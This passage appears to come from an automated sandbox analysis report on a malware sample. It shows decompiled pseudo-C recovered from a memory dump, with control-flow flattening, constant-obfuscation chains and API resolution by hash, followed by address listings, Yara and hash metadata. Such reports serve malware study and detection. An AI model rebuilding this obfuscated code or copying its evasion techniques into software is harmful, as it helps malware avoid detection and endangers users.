											goto L14;
										} else {
											_t225 = 0x4a0fd12;
											continue;
										}
									}
								}
							}
							goto L15;
						}
						_t221 = _v72;
						_t210 = _v48;
						E0121715A(_v48, _v72, _v20, _v24,  *(_t224 + 0x20));
						_t228 =  &(_t228[3]);
						_t225 = 0x69342d1;
						_t201 = 0x273cd46;
						L14:
						__eflags = _t225 - 0x69342d1;
					} while (__eflags != 0);
					L15:
					return _t201;
				}
			}




































                          0x0123261e
                          0x01232621
                          0x01232626
                          0x0123262b
                          0x01232633
                          0x0123263b
                          0x0123264b
                          0x0123264d
                          0x01232653
                          0x01232658
                          0x0123265d
                          0x01232663
                          0x0123266b
                          0x01232673
                          0x0123267b
                          0x01232683
                          0x0123268b
                          0x01232698
                          0x01232699
                          0x012326a2
                          0x012326a6
                          0x012326ae
                          0x012326bb
                          0x012326bf
                          0x012326c9
                          0x012326cd
                          0x012326d5
                          0x012326dd
                          0x012326e5
                          0x012326ed
                          0x012326f5
                          0x012326fd
                          0x01232705
                          0x0123270d
                          0x01232715
                          0x0123271d
                          0x01232725
                          0x0123272a
                          0x0123272f
                          0x01232733
                          0x0123273b
                          0x01232743
                          0x0123274b
                          0x01232753
                          0x0123275b
                          0x01232763
                          0x01232771
                          0x01232775
                          0x0123277d
                          0x0123278a
                          0x0123278e
                          0x01232793
                          0x0123279b
                          0x012327a3
                          0x012327ab
                          0x012327b0
                          0x012327b8
                          0x012327c0
                          0x012327c8
                          0x012327d0
                          0x012327dd
                          0x012327e1
                          0x012327e9
                          0x012327f1
                          0x012327f9
                          0x01232803
                          0x01232810
                          0x0123281f
                          0x01232820
                          0x01232824
                          0x0123282c
                          0x01232834
                          0x0123283c
                          0x01232844
                          0x0123284e
                          0x01232852
                          0x0123285a
                          0x01232862
                          0x0123286a
                          0x0123286f
                          0x01232874
                          0x0123287c
                          0x01232884
                          0x01232891
                          0x01232895
                          0x0123289a
                          0x012328a2
                          0x012328aa
                          0x012328ae
                          0x012328b0
                          0x012328b4
                          0x012328bc
                          0x012328c4
                          0x012328cc
                          0x012328d4
                          0x012328d4
                          0x012328d4
                          0x012328d9
                          0x00000000
                          0x012328d9
                          0x012328e3
                          0x012329a6
                          0x012329ab
                          0x012329ae
                          0x012329b1
                          0x012329b3
                          0x012329b5
                          0x00000000
                          0x012329b5
                          0x012328e9
                          0x012328ef
                          0x01232966
                          0x0123296a
                          0x0123296d
                          0x01232972
                          0x01232975
                          0x01232978
                          0x0123297c
                          0x01232981
                          0x00000000
                          0x012328f1
                          0x012328f7
                          0x0123290c
                          0x01232917
                          0x0123291c
                          0x01232921
                          0x01232923
                          0x01232934
                          0x01232939
                          0x0123293c
                          0x01232940
                          0x01232944
                          0x01232948
                          0x0123294c
                          0x01232951
                          0x01232954
                          0x012328d4
                          0x012328d4
                          0x012328d4
                          0x00000000
                          0x012328d4
                          0x012328d4
                          0x012328f9
                          0x012328ff
                          0x00000000
                          0x01232905
                          0x01232905
                          0x00000000
                          0x01232905
                          0x012328ff
                          0x012328f7
                          0x012328ef
                          0x00000000
                          0x012328e3
                          0x012329c7
                          0x012329cb
                          0x012329cf
                          0x012329d4
                          0x012329d7
                          0x012329dc
                          0x012329e1
                          0x012329e1
                          0x012329e1
                          0x012329f4
                          0x012329f4
                          0x012329f4

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: NX:$'2$)d$33V$NX:$NX:$XmFv$sk$|s$0<
                          • API String ID: 0-1033120914
                          • Opcode ID: 8be48d9ccb67b5d84ad6f2df80abbee96e2ff9ff745ff269ff091d9ec55a652f
                          • Instruction ID: d65d197454457c4c9775261f92d2b253b397de957d7b9fc7de35fafe3f75b7fa
                          • Opcode Fuzzy Hash: 8be48d9ccb67b5d84ad6f2df80abbee96e2ff9ff745ff269ff091d9ec55a652f
                          • Instruction Fuzzy Hash: 9DA141B14183829FC358CF25C58540BFBE1FBD4758F105A1DF596A6260D3B5DA488F83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01221591, Relevance: 11.9, Strings: 9, Instructions: 624COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E01221591(intOrPtr __ecx, intOrPtr* __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				intOrPtr* _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				intOrPtr _v500;
				signed int _v504;
				signed int _v508;
				unsigned int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t610;
				signed int _t662;
				signed int _t668;
				void* _t669;
				intOrPtr _t677;
				void* _t687;
				intOrPtr* _t689;
				signed int _t694;
				intOrPtr _t697;
				int _t700;
				intOrPtr _t704;
				intOrPtr _t711;
				signed int _t712;
				signed int _t713;
				intOrPtr _t714;
				intOrPtr* _t720;
				signed int _t741;
				void* _t780;
				void* _t787;
				void* _t794;
				void* _t795;
				void* _t796;
				signed int _t798;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				intOrPtr _t813;
				void* _t814;
				void* _t817;
				void* _t821;
				signed int _t823;
				intOrPtr _t824;
				signed int* _t825;
				void* _t829;

				_t825 =  &_v560;
				_v296 = __edx;
				_v500 = __ecx;
				_v308 = 0x34a367;
				_v308 = _v308 >> 0x10;
				_t610 = 0x34;
				_v308 = _v308 ^ _t610;
				_t817 = 0xea2f645;
				_v544 = 0xb8bac1;
				_v544 = _v544 << 0xa;
				_v544 = _v544 + 0xdd4e;
				_v544 = _v544 | 0x419410b7;
				_v544 = _v544 ^ 0xe3f195cc;
				_v324 = 0x787f17;
				_v324 = _v324 + 0xffffba2f;
				_v324 = _v324 ^ 0x007da03d;
				_v380 = 0x7ae48a;
				_v380 = _v380 + 0xc297;
				_v380 = _v380 ^ 0x00775dd8;
				_v504 = 0xe211d8;
				_push("true");
				_pop(_t712);
				_v504 = _v504 * 0x73;
				_v504 = _v504 + 0x796b;
				_v504 = _v504 << 7;
				_v504 = _v504 ^ 0xc7330412;
				_v452 = 0xdce441;
				_v452 = _v452 + 0xffffe6d5;
				_v452 = _v452 / _t712;
				_v452 = _v452 ^ 0x000328d8;
				_v316 = 0x2bb0df;
				_t802 = 0x48;
				_v316 = _v316 * 0x36;
				_v316 = _v316 ^ 0x0939efeb;
				_v356 = 0xcad995;
				_v356 = _v356 * 0x55;
				_v356 = _v356 ^ 0x43500611;
				_v436 = 0xa94819;
				_v436 = _v436 / _t802;
				_v436 = _v436 << 0xa;
				_v436 = _v436 ^ 0x096cc0d5;
				_v404 = 0xcd31f2;
				_v404 = _v404 >> 9;
				_v404 = _v404 / _t712;
				_v404 = _v404 ^ 0x0006c8f5;
				_v348 = 0x543f35;
				_v348 = _v348 ^ 0x72886b43;
				_v348 = _v348 ^ 0x72d10eb7;
				_v536 = 0x1951a2;
				_t803 = 0x6f;
				_v536 = _v536 / _t803;
				_v536 = _v536 << 2;
				_v536 = _v536 ^ 0x5e9308a1;
				_v536 = _v536 ^ 0x5e95c1b7;
				_v420 = 0x5bda6e;
				_v420 = _v420 + 0xbe40;
				_v420 = _v420 * 0x29;
				_v420 = _v420 ^ 0x0ed93f0e;
				_v372 = 0xbac8fa;
				_v372 = _v372 ^ 0x6eee89e1;
				_v372 = _v372 ^ 0x6e5995b3;
				_v444 = 0x831612;
				_v444 = _v444 + 0xffff13c8;
				_v444 = _v444 + 0xffff4520;
				_v444 = _v444 ^ 0x0089c369;
				_v364 = 0x1eb95;
				_t823 = 0x78;
				_v364 = _v364 / _t823;
				_v364 = _v364 ^ 0x000f7d8c;
				_v388 = 0x78cb3e;
				_t804 = 0x68;
				_v388 = _v388 / _t804;
				_v388 = _v388 ^ 0x000e12a4;
				_v472 = 0xfe8b39;
				_v472 = _v472 ^ 0x4a79d81a;
				_v472 = _v472 | 0x4684679d;
				_v472 = _v472 ^ 0xb86bdad5;
				_v472 = _v472 ^ 0xf6e974af;
				_v508 = 0xf7b85e;
				_v508 = _v508 + 0xffff1a7c;
				_v508 = _v508 >> 8;
				_v508 = _v508 ^ 0x91f47709;
				_v508 = _v508 ^ 0x91fdf719;
				_v360 = 0xb3ef91;
				_v360 = _v360 << 1;
				_v360 = _v360 ^ 0x016ac8eb;
				_v516 = 0xc83176;
				_v516 = _v516 >> 3;
				_v516 = _v516 << 7;
				_t805 = 0x60;
				_v516 = _v516 / _t805;
				_v516 = _v516 ^ 0x00216802;
				_v524 = 0x99d0bf;
				_t713 = 0x2e;
				_v524 = _v524 / _t713;
				_v524 = _v524 | 0x32ed1f8e;
				_v524 = _v524 << 8;
				_v524 = _v524 ^ 0xef580268;
				_v520 = 0xec019;
				_v520 = _v520 << 7;
				_v520 = _v520 >> 8;
				_v520 = _v520 + 0xffff3d31;
				_v520 = _v520 ^ 0x000f9caf;
				_v428 = 0x847880;
				_v428 = _v428 ^ 0x2d8b13d9;
				_v428 = _v428 + 0x571a;
				_v428 = _v428 ^ 0x2d08cc52;
				_v412 = 0x94859;
				_v412 = _v412 << 0xa;
				_v412 = _v412 >> 0xa;
				_v412 = _v412 ^ 0x0001710a;
				_v300 = 0x507a00;
				_v300 = _v300 ^ 0x479f05f7;
				_v300 = _v300 ^ 0x47c7f35c;
				_v480 = 0x5775fb;
				_v480 = _v480 | 0x3774da5c;
				_v480 = _v480 + 0xffff1fad;
				_v480 = _v480 << 4;
				_v480 = _v480 ^ 0x777d225e;
				_v456 = 0xf57b23;
				_v456 = _v456 >> 0xf;
				_v456 = _v456 ^ 0xca18f90f;
				_v456 = _v456 ^ 0xca1daf67;
				_v460 = 0x7bc476;
				_v460 = _v460 >> 9;
				_v460 = _v460 >> 0xc;
				_v460 = _v460 ^ 0x000f4177;
				_v396 = 0x39e094;
				_v396 = _v396 >> 5;
				_v396 = _v396 << 0xd;
				_v396 = _v396 ^ 0x39e28150;
				_v488 = 0x70552;
				_v488 = _v488 << 0xa;
				_v488 = _v488 ^ 0x8d9a573e;
				_v488 = _v488 + 0xffffa6c3;
				_v488 = _v488 ^ 0x91806b88;
				_v448 = 0x8da13a;
				_v448 = _v448 << 0xa;
				_t806 = 0x16;
				_v448 = _v448 * 0x5f;
				_v448 = _v448 ^ 0x3b51015c;
				_v512 = 0xddb448;
				_v512 = _v512 << 9;
				_v512 = _v512 >> 0xe;
				_v512 = _v512 >> 8;
				_v512 = _v512 ^ 0x000fce2e;
				_v548 = 0xc52d6d;
				_v548 = _v548 ^ 0x08838af8;
				_v548 = _v548 << 5;
				_v548 = _v548 / _t823;
				_v548 = _v548 ^ 0x00188708;
				_v552 = 0x8ecc4c;
				_v552 = _v552 / _t806;
				_v552 = _v552 * 0xe;
				_v552 = _v552 << 0xc;
				_v552 = _v552 ^ 0xadfad4dc;
				_v340 = 0x57b067;
				_v340 = _v340 * 0x41;
				_v340 = _v340 ^ 0x164d2235;
				_v556 = 0x43c70a;
				_v556 = _v556 ^ 0x7f907696;
				_v556 = _v556 | 0xbacc01dc;
				_v556 = _v556 + 0xffff5123;
				_v556 = _v556 ^ 0xffd9e2b4;
				_v376 = 0x7b30da;
				_v376 = _v376 + 0x200b;
				_v376 = _v376 ^ 0x0072d724;
				_v440 = 0x67eef8;
				_v440 = _v440 >> 0xe;
				_v440 = _v440 + 0x5160;
				_v440 = _v440 ^ 0x000fcbf1;
				_v384 = 0x368c0f;
				_v384 = _v384 / _t713;
				_v384 = _v384 ^ 0x0007162a;
				_v332 = 0xf7e74f;
				_v332 = _v332 + 0xb023;
				_v332 = _v332 ^ 0x00fabd9f;
				_v304 = 0xa5764c;
				_v304 = _v304 + 0xffff6f82;
				_v304 = _v304 ^ 0x00aa90b6;
				_v464 = 0x7a1571;
				_v464 = _v464 << 8;
				_v464 = _v464 + 0xd5fa;
				_v464 = _v464 ^ 0x7a16e9d6;
				_v432 = 0x65ae54;
				_v432 = _v432 | 0xf549fffc;
				_v432 = _v432 ^ 0xf56ac653;
				_v368 = 0x9cc546;
				_v368 = _v368 << 0xe;
				_v368 = _v368 ^ 0x31533563;
				_v532 = 0xbb333f;
				_t807 = 0x34;
				_v532 = _v532 / _t807;
				_v532 = _v532 + 0xfffff079;
				_v532 = _v532 + 0x8871;
				_v532 = _v532 ^ 0x000afd0d;
				_v540 = 0xad9ffb;
				_v540 = _v540 + 0x1d27;
				_v540 = _v540 + 0xffffe294;
				_v540 = _v540 >> 2;
				_v540 = _v540 ^ 0x0027e576;
				_v496 = 0xee481f;
				_t808 = 0x33;
				_v496 = _v496 * 0x16;
				_t809 = 0x6b;
				_v496 = _v496 / _t808;
				_v496 = _v496 + 0xffff904f;
				_v496 = _v496 ^ 0x00673c1b;
				_v528 = 0x7b550f;
				_v528 = _v528 >> 5;
				_v528 = _v528 | 0x82d55b10;
				_v528 = _v528 << 1;
				_v528 = _v528 ^ 0x05a590f6;
				_v312 = 0x355af7;
				_v312 = _v312 << 0xa;
				_v312 = _v312 ^ 0xd568e6b4;
				_v416 = 0x50c1da;
				_v416 = _v416 + 0xffff3e63;
				_v416 = _v416 << 7;
				_v416 = _v416 ^ 0x2808c0da;
				_v352 = 0x788565;
				_v352 = _v352 << 0xb;
				_v352 = _v352 ^ 0xc42c8c91;
				_v424 = 0x444211;
				_v424 = _v424 ^ 0x494f7f50;
				_v424 = _v424 + 0xffff1346;
				_v424 = _v424 ^ 0x49031dbd;
				_v492 = 0xa142e8;
				_v492 = _v492 / _t809;
				_t810 = 0x14;
				_v492 = _v492 / _t810;
				_t811 = 0x21;
				_v492 = _v492 * 0x18;
				_v492 = _v492 ^ 0x00042e76;
				_v336 = 0xd9ae2c;
				_v336 = _v336 | 0x39c0196c;
				_v336 = _v336 ^ 0x39d2ae46;
				_v344 = 0x2d620e;
				_v344 = _v344 * 0x32;
				_v344 = _v344 ^ 0x08d7e910;
				_v400 = 0xcb12f4;
				_v400 = _v400 >> 0x10;
				_v400 = _v400 + 0xffff3b1e;
				_v400 = _v400 ^ 0xfffe3ac8;
				_v408 = 0x96e27b;
				_v408 = _v408 | 0xfd2a95fa;
				_v408 = _v408 << 9;
				_v408 = _v408 ^ 0x7de6200f;
				_v392 = 0xd8cfb0;
				_v392 = _v392 * 0x1b;
				_t714 = _v296;
				_v392 = _v392 / _t811;
				_v392 = _v392 ^ 0x00b38f79;
				_v328 = 0x749801;
				_v328 = _v328 | 0x8fe0b18f;
				_v328 = _v328 ^ 0x8ffad11a;
				_v476 = 0x8564d4;
				_v476 = _v476 << 0xa;
				_t483 =  &_v476; // 0xa
				_t812 = 0x7a;
				_t824 = _v296;
				_v476 =  *_t483 / _t812;
				_t490 =  &_v476; // 0xa
				_t813 = _v296;
				_v476 =  *_t490 * 0x26;
				_v476 = _v476 ^ 0x06b05b0a;
				_v484 = 0xd8d973;
				_v484 = _v484 << 6;
				_v484 = _v484 | 0xfddb9f7b;
				_v484 = _v484 ^ 0xfff3c4d3;
				_v320 = 0xfbd867;
				_v320 = _v320 >> 5;
				_v320 = _v320 ^ 0x000f339c;
				_v468 = 0xc51dfd;
				_v468 = _v468 << 8;
				_v468 = _v468 >> 7;
				_v468 = _v468 ^ 0x4728b7d1;
				_v468 = _v468 ^ 0x46a9f958;
				while(1) {
					L1:
					while(1) {
						_t829 = _t817 - 0x815e78c;
						if(_t829 <= 0) {
						}
						L3:
						if(_t829 == 0) {
							E01232C81(_v496,  *_t720, _v528, _t714, _v312,  *((intOrPtr*)(_t720 + 4)));
							_t720 = _v500;
							_t825 =  &(_t825[4]);
							_t668 = _v560;
							_t817 = 0xca82f1;
							_t714 = _t714 +  *((intOrPtr*)(_t720 + 4));
							L14:
							_t780 = 0x99540a6;
							continue;
							do {
								while(1) {
									_t829 = _t817 - 0x815e78c;
									if(_t829 <= 0) {
									}
									goto L19;
								}
								goto L3;
								L31:
								__eflags = _t817 - 0xec6b752;
							} while (_t817 != 0xec6b752);
							L32:
							return _v560;
						}
						if(_t817 == 0x3da101) {
							E0121AE43(_t668, _v320, _v468);
							return 0;
						}
						if(_t817 == 0xca82f1) {
							_push(_v492);
							_push(_v424);
							_push(_v352);
							_t687 = E01223CC9(_v336, __eflags,  &_v256, _v292 - _t714, _v344, E0121387F(_v416, 0x12115fc), _v400, _v408);
							E0122629F(_v392, _t683, _v328, _v476, _v484);
							_t689 = _v296;
							 *_t689 = _t824;
							 *((intOrPtr*)(_t689 + 4)) = _t714 + _t687 - _t824;
							goto L32;
						}
						if(_t817 == 0x1162a32) {
							_t821 =  &_v256;
							_push(_t720);
							_push(0x10);
							_t794 = 8;
							_t795 = E01212C02(_t794);
							_t694 = _v308;
							_pop(0);
							__eflags = _t694 - _t795;
							if(_t694 < _t795) {
								_t798 = _t795 - _t694;
								_t814 = _t821;
								_t741 = _t798 >> 1;
								__eflags = _t741;
								_t700 = memset(_t814, 0x2d002d, _t741 << 2);
								asm("adc ecx, ecx");
								_t821 = _t821 + _t798 * 2;
								memset(_t814 + _t741, _t700, 0);
								_t825 =  &(_t825[6]);
							}
							_push(0);
							_push(0x10);
							_t796 = 8;
							_t697 = E01212C02(_t796);
							_push(_v472);
							_t813 = _t697;
							_push(_t821);
							_push(0xb);
							_push(_v388);
							E01214A97(_t813, _v364);
							_t817 = 0x89cda0d;
							L11:
							_t825 =  &(_t825[6]);
							L12:
							_t668 = _v560;
							L13:
							_t720 = _v500;
							goto L14;
						}
						if(_t817 == 0x1fa8b82) {
							__eflags = 1;
							_push(_t720);
							_t704 = E01212C02(1, 8);
							_push(_v452);
							_t813 = _t704;
							_push( &_v288);
							_push(9);
							_push(_v504);
							E01214A97(_t813, _v380);
							_t817 = 0xbf850a1;
							goto L11;
						}
						if(_t817 != 0x3d03c9c) {
							goto L31;
						}
						_t813 = _t813 +  *((intOrPtr*)(_t720 + 4));
						_push(_t720);
						_push(_t720);
						_t711 = E01225212(_t813);
						_t720 = _v500;
						_t824 = _t711;
						_t825 =  &(_t825[3]);
						_t780 = 0x99540a6;
						_t817 =  !=  ? 0x99540a6 : 0x3da101;
						goto L1;
						L19:
						__eflags = _t817 - 0x89cda0d;
						if(_t817 == 0x89cda0d) {
							_t813 = 0x4000;
							_push(0x4000);
							_push(0x4000);
							_t662 = E01225212(0x4000);
							_t825 =  &(_t825[3]);
							_v560 = _t662;
							__eflags = _t662;
							if(_t662 == 0) {
								_t720 = _v500;
								_t817 = 0xec6b752;
								_t780 = 0x99540a6;
								goto L31;
							}
							_t817 = 0xb90b7dd;
							goto L13;
						}
						__eflags = _t817 - _t780;
						if(_t817 == _t780) {
							_push(_v556);
							_push(_v340);
							_v292 = _t813 + _t824;
							_push(_v552);
							_t570 =  &_v548; // 0x27e576
							_t714 = E0122360D( &_v288, __eflags,  &_v128, _v376, _v440, _v384,  &_v256, _t824, _v332, _v304, E0121387F( *_t570, 0x12116ec), _v464) + _t824;
							E0122629F(_v432, _t663, _v368, _v532, _v540);
							_t825 =  &(_t825[0x10]);
							_t817 = 0x815e78c;
							goto L12;
						}
						__eflags = _t817 - 0xb90b7dd;
						if(__eflags == 0) {
							_push(_v412);
							_push(_v428);
							_t669 = E0122CD35(0x12116ac, _v520, __eflags);
							_push( &_v256);
							_push(_t669);
							_push(_t813);
							_push(_v560);
							 *((intOrPtr*)(E01217DE3(_t727, 0xa92f64b6, 0x185)))();
							E0122629F(_v300, _t669, _v480, _v456, _v460);
							_t825 =  &(_t825[7]);
							_t817 = 0x3d03c9c;
							goto L12;
						}
						__eflags = _t817 - 0xbf850a1;
						if(_t817 == 0xbf850a1) {
							_push(_t720);
							_push(0x10);
							_t787 = 4;
							_t677 = E01212C02(_t787);
							_push(_v348);
							_t813 = _t677;
							_push( &_v128);
							_push(0xb);
							_push(_v404);
							E01214A97(_t813, _v436);
							_t817 = 0x1162a32;
							goto L11;
						}
						__eflags = _t817 - 0xea2f645;
						if(_t817 != 0xea2f645) {
							goto L31;
						}
						_t817 = 0x1fa8b82;
					}
				}
			}




















































































































                          0x01221591
                          0x0122159b
                          0x012215a2
                          0x012215a6
                          0x012215b1
                          0x012215bb
                          0x012215bc
                          0x012215c3
                          0x012215c8
                          0x012215d0
                          0x012215d5
                          0x012215dd
                          0x012215e5
                          0x012215ed
                          0x012215f8
                          0x01221603
                          0x0122160e
                          0x01221619
                          0x01221624
                          0x0122162f
                          0x0122163e
                          0x01221640
                          0x01221643
                          0x01221647
                          0x0122164f
                          0x01221654
                          0x0122165c
                          0x01221667
                          0x0122167d
                          0x01221684
                          0x0122168f
                          0x012216a2
                          0x012216a5
                          0x012216ac
                          0x012216b7
                          0x012216ca
                          0x012216d1
                          0x012216dc
                          0x012216f2
                          0x012216f9
                          0x01221701
                          0x0122170c
                          0x01221717
                          0x0122172a
                          0x01221731
                          0x0122173c
                          0x01221747
                          0x01221752
                          0x0122175d
                          0x01221769
                          0x0122176c
                          0x01221770
                          0x01221775
                          0x0122177d
                          0x01221785
                          0x01221790
                          0x012217a3
                          0x012217aa
                          0x012217b5
                          0x012217c0
                          0x012217cd
                          0x012217d8
                          0x012217e3
                          0x012217ee
                          0x012217f9
                          0x01221804
                          0x01221818
                          0x0122181d
                          0x01221826
                          0x01221831
                          0x01221843
                          0x01221848
                          0x01221851
                          0x0122185c
                          0x01221864
                          0x0122186c
                          0x01221874
                          0x0122187c
                          0x01221884
                          0x0122188c
                          0x01221894
                          0x01221899
                          0x012218a1
                          0x012218a9
                          0x012218b4
                          0x012218bb
                          0x012218c6
                          0x012218ce
                          0x012218d3
                          0x012218dc
                          0x012218e1
                          0x012218e7
                          0x012218ef
                          0x012218fb
                          0x012218fe
                          0x01221902
                          0x0122190a
                          0x0122190f
                          0x01221917
                          0x0122191f
                          0x01221924
                          0x01221929
                          0x01221931
                          0x01221939
                          0x01221944
                          0x0122194f
                          0x0122195a
                          0x01221965
                          0x01221970
                          0x01221978
                          0x01221980
                          0x0122198b
                          0x01221996
                          0x012219a1
                          0x012219ac
                          0x012219b4
                          0x012219bc
                          0x012219c4
                          0x012219c9
                          0x012219d1
                          0x012219d9
                          0x012219de
                          0x012219e6
                          0x012219ee
                          0x012219f6
                          0x012219fd
                          0x01221a02
                          0x01221a0a
                          0x01221a15
                          0x01221a1d
                          0x01221a25
                          0x01221a30
                          0x01221a38
                          0x01221a3d
                          0x01221a45
                          0x01221a4d
                          0x01221a55
                          0x01221a60
                          0x01221a72
                          0x01221a73
                          0x01221a7a
                          0x01221a85
                          0x01221a8d
                          0x01221a92
                          0x01221a97
                          0x01221a9c
                          0x01221aa4
                          0x01221aac
                          0x01221ab4
                          0x01221ac1
                          0x01221ac5
                          0x01221acd
                          0x01221add
                          0x01221ae6
                          0x01221aea
                          0x01221aef
                          0x01221af7
                          0x01221b0a
                          0x01221b11
                          0x01221b1c
                          0x01221b24
                          0x01221b2c
                          0x01221b34
                          0x01221b3c
                          0x01221b44
                          0x01221b4f
                          0x01221b5a
                          0x01221b65
                          0x01221b70
                          0x01221b78
                          0x01221b83
                          0x01221b8e
                          0x01221ba2
                          0x01221ba9
                          0x01221bb4
                          0x01221bbf
                          0x01221bca
                          0x01221bd5
                          0x01221be0
                          0x01221beb
                          0x01221bf6
                          0x01221bfe
                          0x01221c03
                          0x01221c0b
                          0x01221c13
                          0x01221c1e
                          0x01221c29
                          0x01221c34
                          0x01221c3f
                          0x01221c47
                          0x01221c52
                          0x01221c60
                          0x01221c67
                          0x01221c6d
                          0x01221c75
                          0x01221c7d
                          0x01221c85
                          0x01221c8d
                          0x01221c95
                          0x01221c9d
                          0x01221ca2
                          0x01221caa
                          0x01221cb7
                          0x01221cba
                          0x01221cc4
                          0x01221cc5
                          0x01221ccb
                          0x01221cd3
                          0x01221cdb
                          0x01221ce3
                          0x01221ce8
                          0x01221cf0
                          0x01221cf4
                          0x01221cfc
                          0x01221d07
                          0x01221d0f
                          0x01221d1a
                          0x01221d25
                          0x01221d30
                          0x01221d38
                          0x01221d43
                          0x01221d4e
                          0x01221d56
                          0x01221d61
                          0x01221d6c
                          0x01221d77
                          0x01221d82
                          0x01221d8d
                          0x01221d9d
                          0x01221da7
                          0x01221dac
                          0x01221db5
                          0x01221db6
                          0x01221dba
                          0x01221dc2
                          0x01221dcd
                          0x01221dd8
                          0x01221de3
                          0x01221df6
                          0x01221dfd
                          0x01221e08
                          0x01221e13
                          0x01221e1b
                          0x01221e26
                          0x01221e31
                          0x01221e3c
                          0x01221e47
                          0x01221e4f
                          0x01221e5a
                          0x01221e6f
                          0x01221e81
                          0x01221e88
                          0x01221e8f
                          0x01221e9a
                          0x01221ea5
                          0x01221eb0
                          0x01221ebb
                          0x01221ec3
                          0x01221ec8
                          0x01221ece
                          0x01221ed1
                          0x01221edd
                          0x01221ee1
                          0x01221ee6
                          0x01221eed
                          0x01221ef1
                          0x01221ef9
                          0x01221f01
                          0x01221f06
                          0x01221f0e
                          0x01221f16
                          0x01221f21
                          0x01221f29
                          0x01221f34
                          0x01221f3c
                          0x01221f41
                          0x01221f46
                          0x01221f4e
                          0x01221f56
                          0x01221f56
                          0x01221f5a
                          0x01221f5a
                          0x01221f60
                          0x01221f60
                          0x01221f66
                          0x01221f66
                          0x012220d0
                          0x012220d5
                          0x012220d9
                          0x012220dc
                          0x012220e0
                          0x012220e5
                          0x0122202d
                          0x0122202d
                          0x01222032
                          0x01221f5a
                          0x01221f5a
                          0x01221f5a
                          0x01221f60
                          0x01221f60
                          0x00000000
                          0x01221f60
                          0x00000000
                          0x012222c4
                          0x012222c4
                          0x012222c4
                          0x012222d0
                          0x00000000
                          0x012222d0
                          0x01221f72
                          0x01222382
                          0x00000000
                          0x01222388
                          0x01221f7e
                          0x012222df
                          0x012222e8
                          0x012222ef
                          0x01222335
                          0x0122235a
                          0x0122235f
                          0x0122236b
                          0x0122236d
                          0x00000000
                          0x0122236d
                          0x01221f8a
                          0x0122203e
                          0x01222049
                          0x0122204a
                          0x0122204e
                          0x01222054
                          0x01222056
                          0x0122205e
                          0x0122205f
                          0x01222061
                          0x01222063
                          0x01222065
                          0x0122206e
                          0x0122206e
                          0x01222070
                          0x01222072
                          0x01222074
                          0x01222077
                          0x01222077
                          0x01222077
                          0x01222088
                          0x01222089
                          0x0122208d
                          0x0122208e
                          0x01222093
                          0x01222097
                          0x01222099
                          0x0122209a
                          0x0122209c
                          0x012220ac
                          0x012220b1
                          0x01222022
                          0x01222022
                          0x01222025
                          0x01222025
                          0x01222029
                          0x01222029
                          0x00000000
                          0x01222029
                          0x01221f96
                          0x01221fef
                          0x01221ff0
                          0x01221ff3
                          0x01221ff8
                          0x01221fff
                          0x01222008
                          0x01222009
                          0x0122200b
                          0x01222018
                          0x0122201d
                          0x00000000
                          0x0122201d
                          0x01221f9e
                          0x00000000
                          0x00000000
                          0x01221faf
                          0x01221fbd
                          0x01221fbe
                          0x01221fc0
                          0x01221fc5
                          0x01221fc9
                          0x01221fcb
                          0x01221fd5
                          0x01221fda
                          0x00000000
                          0x012220ed
                          0x012220ed
                          0x012220f3
                          0x0122228c
                          0x01222299
                          0x0122229a
                          0x0122229c
                          0x012222a1
                          0x012222a4
                          0x012222a8
                          0x012222aa
                          0x012222b6
                          0x012222ba
                          0x012222bf
                          0x00000000
                          0x012222bf
                          0x012222ac
                          0x00000000
                          0x012222ac
                          0x012220f9
                          0x012220fb
                          0x012221e0
                          0x012221ec
                          0x012221f3
                          0x012221fa
                          0x012221fe
                          0x0122225c
                          0x0122226d
                          0x01222272
                          0x01222275
                          0x00000000
                          0x01222275
                          0x01222101
                          0x01222107
                          0x01222172
                          0x0122217e
                          0x01222189
                          0x0122219e
                          0x012221a3
                          0x012221a4
                          0x012221a5
                          0x012221b1
                          0x012221ce
                          0x012221d3
                          0x012221d6
                          0x00000000
                          0x012221d6
                          0x01222109
                          0x0122210f
                          0x01222135
                          0x01222136
                          0x0122213a
                          0x0122213b
                          0x01222140
                          0x01222147
                          0x01222150
                          0x01222151
                          0x01222153
                          0x01222163
                          0x01222168
                          0x00000000
                          0x01222168
                          0x01222111
                          0x01222117
                          0x00000000
                          0x00000000
                          0x0122211d
                          0x0122211d
                          0x01221f5a

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ^"}w$5?T$YH$^"}w$`Q$c5S1$ky$v'$9
                          • API String ID: 0-441490596
                          • Opcode ID: c4b8ffe6adaf62c1785deb87219a619191e699547ebea83a3142d318512e0edb
                          • Instruction ID: 5212f51b6114471cdab7a5a333f925327058aeedae6db010b2ef99982156f003
